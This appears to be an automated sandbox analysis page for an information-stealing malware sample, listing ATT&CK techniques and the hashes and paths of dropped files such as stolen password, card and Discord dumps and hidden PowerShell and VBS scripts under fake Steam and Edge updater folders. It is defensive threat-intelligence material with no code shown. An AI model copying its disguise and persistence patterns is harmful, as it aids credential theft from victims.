Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Steam\Launcher\EN-Eleolwuj.zip

Filesize
2KB

MD5
78c25f25dce8139589cf6a54fad0e46f

SHA1
40ba9d9492d0bde8b30a8d5e72c71fe150ec7fea

SHA256
d0d2ad8195fe6279d47fcb4e79a1c194046bd8f4cbd307e7ba756ec1cadfe965

SHA512
23b8ce3ffa4c45fabce5047468b75598599db808a238cf05b2a1e67a99e8998875c3d113bd699753a11151785e535a53ba450aa915c97870dd165b499b33b144

Download Submit
C:\ProgramData\Steam\Launcher\EN-Eleolwuj\Autofills\Autofills.txt

Filesize
92B

MD5
9985f42c66b05c2bb37a32b11ebc46ef

SHA1
d6748fa5f359007c9c0f869d4a78f6345caa6a4a

SHA256
8035c9f7effd67d0df37b16cd5cdbe55bed549d4b48787a7b323f6474ddca52d

SHA512
5112cf6093eb25f8af08764ece3c9b588054410321f145433836745c8759b5f84b430d4188fb20a8d62565ea3650637ae5a950dd1b61841f3fdb71b4e7ff3b94

Download Submit
C:\ProgramData\Steam\Launcher\EN-Eleolwuj\Cards\Cards.txt

Filesize
68B

MD5
81c8aa870d7aa615de9b68a8d044d005

SHA1
a366e0fd2914dca0b41f4ed6596bb911f4b025a1

SHA256
32fe5f10fb6af4d714db314b0570f945f6dc2401189596009eb79d5d5c5ef703

SHA512
376847440e77370eddca55b3972e0f6f5e659a98043570ff18af5456c105fac83813776f05d963a1efa2842da0e941403b2da59c845ca2facb64e7e3f07cda91

Download Submit
C:\ProgramData\Steam\Launcher\EN-Eleolwuj\Discord\discord.txt

Filesize
15B

MD5
675951f6d9d75fd2c9c06b5ff547c6fd

SHA1
9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09

SHA256
60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244

SHA512
44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

Download Submit
C:\ProgramData\Steam\Launcher\EN-Eleolwuj\Passwords\Passwords.txt

Filesize
76B

MD5
b6f15d039b7fff844897b44e2bd16a0c

SHA1
5cdbcf45867a33d6e2d453f6d6a2566c54f72ef2

SHA256
1b43aa4f80c538b79e576fa045c7ad450b0fe632687444066776f12315b64340

SHA512
c9906a5a05ddc52cbacf51321c0c65af6ca219b036a5b2649ecfdd209c3590d02d2713d28d35568622c4e7ff0462449085d8b971abd9d9576c0dee6023964b34

Download Submit
C:\ProgramData\Steam\Launcher\EN-Eleolwuj\Serial-Check.txt

Filesize
504B

MD5
bf60ed3dda33686671c48066b3061b2a

SHA1
64664dbba5967c35db948268f3d32bdcacb3677b

SHA256
2474b128256f809c280180e51688b9b5b67bb7c8d41e19dd677f5a812b29c5ae

SHA512
3e963c82bc158b7c6a796060a172a3106de87bb9eccd113e2c227b54d7729da36b1f2dd5e171f2d81ab3b9cef49bc26a707c54cd8e5d6a0098c2fe70be2acd73

Download Submit
C:\ProgramData\Steam\Launcher\EN-Eleolwuj\debug.log

Filesize
1KB

MD5
f9c3611434ce4903a65d693e120387a0

SHA1
76fbe07e2cfe3dfec1115157782f35c99955c893

SHA256
9639fd62a5d39c057cca10fea208ffa3e8e359d71d14f9c86dfe39b1772e993b

SHA512
c6436e4db30edff553cc421e6b9d3017b09801df19a53abfc19ab40d3da5448b913223b5d5ede312ec78c350212c5f47a5b9756b16a2565974f33fc8959bd021

Download Submit
C:\ProgramData\Steam\Launcher\EN-Eleolwuj\stolen_files.zip

Filesize
22B

MD5
76cdb2bad9582d23c1f6f4d868218d6c

SHA1
b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

SHA256
8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

SHA512
5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

Download Submit
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

Filesize
1KB

MD5
19da1b26f897f892f5f05cd446a564a0

SHA1
acdf68e279f281cb18da6c7e2bdfecad3de5608b

SHA256
4ba5bc28cf9a69d34ac9e9972c190c3f9776f32402a6d8e2479619a0dbe684e1

SHA512
fdd36456bc83fa21f9dfe96784b896b2e9a1559f1a6bf3ecec66dfc85223fceaa16352b15546a8a1904bf30d9330008fb26bb0ea90f0b680173f0758f1c1e087

Download Submit
C:\ProgramData\edge\Updater\Get-Clipboard.ps1

Filesize
3KB

MD5
a8834c224450d76421d8e4a34b08691f

SHA1
73ed4011bc60ba616b7b81ff9c9cad82fb517c68

SHA256
817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5

SHA512
672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

Download Submit
C:\ProgramData\edge\Updater\RunBatHidden.vbs

Filesize
146B

MD5
14a9867ec0265ebf974e440fcd67d837

SHA1
ae0e43c2daf4c913f5db17f4d9197f34ab52e254

SHA256
cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1

SHA512
36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a303fe1a2f9ff11a55d664be374b5b28

SHA1
2ffabc61eb1dcf59e49339d36e1f2f8c86b92c19

SHA256
b4a3b1f2715b929513b5c2bc4834fc77b0b2fd1416012ad522617b48cb3041b2

SHA512
1e85a53b10926f2c513a4559b74c7f701c3424ab56441b849c4095e408d4ab46b55c30e08cd07d30abac37c0e93a3d5082a6942cd665dd52607241e547c4cfe8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a970ed6bf852db6347b84638dd3e6c9c

SHA1
56b4312038b021bb59b5427b48f0cd8617142085

SHA256
989ffc5eb3e413a7fa949d60ce8f53dc8cbbadaea5e84bbadb8fa2d4ce559d7c

SHA512
a1db694f1b45eee1e46ebc8ccac408bda70ef2b4a1270975533fdc6149a132fe1e2377ca2e18b874353ce7cda2f70711bf6695c695c1d147443e9060ff308fad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
22bc908984084e9dde124d9bf5352fae

SHA1
59014a56b89b7f2d10a182c21f0190bb1c0490de

SHA256
cdb47827dcfbe986d5df7a9c0b5137d8194f248b8369ee0d80abc61d64f4e1df

SHA512
f3f7bad6f8f491fac926e8d039d0c37d5c492a304af76ca820e657b543f70582758b1e791ada27e04db77301784b7ba92e2e389edc4534d4ba7e69734095b8c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
051a74485331f9d9f5014e58ec71566c

SHA1
4ed0256a84f2e95609a0b4d5c249bca624db8fe4

SHA256
3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888

SHA512
1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
2ed738b5a133397ceaa850e1c0770a2c

SHA1
8a27df10998b73d55cadf7574a647e34a76ba170

SHA256
1c79d02d93acefc34f2e4c9cec668c46327b7a81217cf82f7fea414927acdb8f

SHA512
9cf68a62399700bba332aed2bf25ad11366becaaf7c7e67a69872204da93662bda7734e3c3c3322738e43bca08596c561607ed0a2b64dd4eb031e812aae3b5e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

Filesize
2KB

MD5
98ad6b32670f3706ab1198e64d7d16f0

SHA1
e8034ee10bb7dde7108344f0021b0db208dae52b

SHA256
b4399260766e6765a59df8f3052863404dc073c33eff9cc0159aa65231b22a71

SHA512
3f2c27c6075fa4962f3d289c37dbe2e5c108e18c06febd83f350229beeaad2d4b65970c009b8b42c86e48d7d0b4d6fbc2aaa176dac52c89380825c17039c8b01

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB94D.tmp

Filesize
1KB

MD5
d1e53f38bb5ef2bf284152f19f1f1f6b

SHA1
47d7a5ca1bd5f21b141e71664cf339ec9861777f

SHA256
0d5d7a0646a8b38769347f48aec89eeabf615710a48c60ffb1bb283f75703418

SHA512
9024f0509aad3e82a4dc548b9ecd6871f0527b3cf980e440b38eb66be679969d8c25a59d742688c0bcc7ec895e5876668f6895c95456640d9369f8f5a9581527

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC4E6.tmp

Filesize
1KB

MD5
bf9f3046ac1eea58b17fc85dda65ae8a

SHA1
7aef508e6f0d9c20c3d451ac4f8082591121eead

SHA256
5e2a49cdd62d70697bd8423efe89df66153b7c62a55f5766a93e3c775b3037ed

SHA512
89adddda7f69fb4710fbd71499b5755acaf6682a659ff31aa3ee1001a3158e9562b83b8a49929b5b10dc12574a2bf7a2c7554bd8352d7a79dfd68dcaffa0817d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o3oe5emp.vhs.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dd32fube\dd32fube.dll

Filesize
3KB

MD5
d4b02d333cd3a360310eb722fb18dd61

SHA1
5e1bd35bfea2d5fd678607d391395c53148b82e3

SHA256
e5b6c32c3fcdcfa45065ca73c705b06a3b042a50b4b779bf546634c4da49a780

SHA512
a50c25292116ade33e74a7d66900c4f86a8f307818b81550d1db2344237c2e45108d428c3de30aa9252ba47c77c1c5d289757eda3a85178a4e1d561b9396192c

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.ps1

Filesize
379B

MD5
18047e197c6820559730d01035b2955a

SHA1
277179be54bba04c0863aebd496f53b129d47464

SHA256
348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3

SHA512
1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

Download Submit
C:\Users\Admin\AppData\Local\Temp\xwxvyger\xwxvyger.dll

Filesize
3KB

MD5
fc2cea214119a9f3ae25b15209d144d3

SHA1
e663506994eea29c818ea778dacb6eebdae921ff

SHA256
2a03031f10b7a7ccc025166a7cf87ed5023c19d4d5db0ba742ccde2bb7a6b300

SHA512
216aabe219e0a7ec8958e0f95512f6ddf81b4ee29d535846c4dfcc7b76c930bff3eea9321634d95e861e00f030c5234a254bb33f34a9e0f3b54a14b5f4f0c6db

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dd32fube\CSC252580AF21234BAEBE05E7475E5B972.TMP

Filesize
652B

MD5
3e174f5279d2c34a7290498587aa9e02

SHA1
6270c2bd40879d9e1982cb1e9f5a480aad3ce6b9

SHA256
5a5430a1bc55d1d49ddd43a9a9da4f181c92d734feced5893943b7c2cbc2243d

SHA512
c42c9135d985283de9d26812ef5afbc497a71da2224b7aabfd594cbef725dab5ebc94f61c8ff3e0fddae96712bb5707eacdb312585520c9d044bb3f5e41f55d4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dd32fube\dd32fube.0.cs

Filesize
426B

MD5
b462a7b0998b386a2047c941506f7c1b

SHA1
61e8aa007164305a51fa2f1cebaf3f8e60a6a59f

SHA256
a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35

SHA512
eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dd32fube\dd32fube.cmdline

Filesize
369B

MD5
ff117542547cea59519f935d0b2b06ac

SHA1
b874dffa9e100c22c4318c7eafdfdd5265ce6df2

SHA256
c460d6a64eba7df4fd23e7cdb24fc6d982f5b7749ec553df6bf92567cef8dcde

SHA512
757802a1b31c1da8cb1764e26af7a7e2648d980cf1083c5e2f91612b12208876e371882379dbb1bed5bfcd9848f217a6b495d8c7740f37f1bf81794191a38349

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xwxvyger\CSCB4201A13B28432ABDEB1AC3E9D25B17.TMP

Filesize
652B

MD5
14d6119faa0a5800702eb0cfc36c0bf7

SHA1
86e47c568d2724ff505ed9b323cb7482f4020030

SHA256
1ef1291d26aa4ede7b6b5e8a1dc9c9cbfb3fd30ecefc6e3516ee3726ed474ee8

SHA512
ca0d850de2293e81c3aa0d503fe83bbcd9f0f96c0d6b2266a425157fe52ac36f3ecd1f6e39b1f129f89f2f7b73ca9b7b3656ddff967c73def90e10b120ba6cac

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xwxvyger\xwxvyger.0.cs

Filesize
311B

MD5
7bc8de6ac8041186ed68c07205656943

SHA1
673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75

SHA256
36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697

SHA512
0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xwxvyger\xwxvyger.cmdline

Filesize
369B

MD5
b3521759a2608de71ff913d3c763694a

SHA1
3fbeec2e346996952e6cf9059f0f166aa356da96

SHA256
2894175fd4793039c7a359eeb4cfa1222ada7b76bf8fa805b710ba620e5d2fca

SHA512
b4efcf44931167afec85824fcaecdfb16e8973b3b301fe81e23e977999af362be8021436bf82882c1a21e403c95a2d4436b260d6e63f8a010577c33719a242f6

Download Submit
memory/924-85-0x00007FF9C66C0000-0x00007FF9C7182000-memory.dmp

Filesize
10.8MB

Download
memory/924-84-0x00000254E90D0000-0x00000254E9116000-memory.dmp

Filesize
280KB

Download
memory/924-83-0x00007FF9C66C0000-0x00007FF9C7182000-memory.dmp

Filesize
10.8MB

Download
memory/924-82-0x00007FF9C66C0000-0x00007FF9C7182000-memory.dmp

Filesize
10.8MB

Download
memory/924-81-0x00000254E8A70000-0x00000254E8A92000-memory.dmp

Filesize
136KB

Download
memory/924-72-0x00007FF9C66C3000-0x00007FF9C66C5000-memory.dmp

Filesize
8KB

Download
memory/924-98-0x00000254E9070000-0x00000254E9078000-memory.dmp

Filesize
32KB

Download
memory/924-101-0x00007FF9C66C0000-0x00007FF9C7182000-memory.dmp

Filesize
10.8MB

Download
memory/2968-111-0x00000239D2230000-0x00000239D2280000-memory.dmp

Filesize
320KB

Download
memory/4660-186-0x0000021175760000-0x0000021175768000-memory.dmp

Filesize
32KB

Download